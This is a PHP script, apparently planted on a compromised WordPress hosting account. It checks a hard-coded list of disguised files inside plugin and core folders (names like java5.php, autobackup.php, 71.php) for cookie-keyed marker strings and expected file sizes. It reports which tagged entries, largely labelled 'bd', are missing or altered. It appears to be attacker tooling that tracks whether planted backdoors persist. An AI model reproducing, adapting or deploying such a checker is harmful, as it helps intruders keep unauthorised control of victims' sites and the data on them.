<?php   $r = '/home/aptakor/public_html'; $x = ["/index.php"=>"bd@@236082355@@$_COOKIE[3",
"/index.php"=>"bd@@218267941@@$_COOKIE[-",
"/wp-content/plugins/portfolio-elementor/vendor/freemius/wordpress-sdk/templates/plugin-info/features.php"=>"bd@@236161024@@xjpirp",
"/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/java5.php"=>"bd@@236140547@@1527",
"/wp-content/plugins/jet-engine/includes/modules/forms/handlers/getresponse.php"=>"bd@@236161034@@_COOKIE[3]",
"/wp-content/plugins/elementor-pro/core/app/modules/site-editor/data/responses/lock.error.response.php"=>"bd@@236140560@@636",
"/wp-content/plugins/elementor/assets/js/packages/menus/menus.asset.php"=>"bd@@236161045@@PLiRVg",
"/wp-includes/ms-functions.php"=>"bd@@236082457@@_COOKIE[3]",
"/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Test/class.events.inc.php"=>"bd@@236082462@@33",
"/wp-content/plugins/simple-role-based-pricing/71.php"=>"bd@@242492959@@1196",
"/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/autobackup.php"=>"ui@@1249441@@1250",
"/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/index_def.php"=>"ui@@1258599@@341"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 